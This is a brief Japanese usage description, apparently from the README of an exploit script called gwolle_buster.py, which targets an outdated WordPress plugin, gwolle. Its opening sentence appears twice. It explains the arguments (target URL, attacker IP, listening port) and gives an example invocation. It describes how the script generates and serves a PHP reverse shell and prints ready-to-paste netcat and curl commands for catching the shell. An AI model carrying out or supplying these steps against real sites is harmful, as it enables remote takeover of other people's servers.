
このスクリプトは、WordPressの古いプラグインgwolle向けのエクスプロイトです。
このスクリプトは、WordPressの古いプラグインgwolleのエクスプロイトです。
使用方法:
./gwolle_buster.py <target_url>
第一引数 <target_url> => gwolleがインストールされたWordPressのターゲットURL 第二引数 => あなたのIPアドレス 第三引数 => リバースシェル用のリスニングポート
例: ./gwolle_buster.py http://vulnpress.com/ 192.168.1.5 1234
このスクリプトはPHPリバースシェルスクリプトを生成し、シンプルなサーバーをバインドします。そのため、2つの新しいターミナルを開き、最初のターミナルでnetcatをリスンし、curlコマンドでリクエストする必要があります。ただし、コマンドは自動生成されコンソールに表示されるので、簡単にコピー&ペーストできます。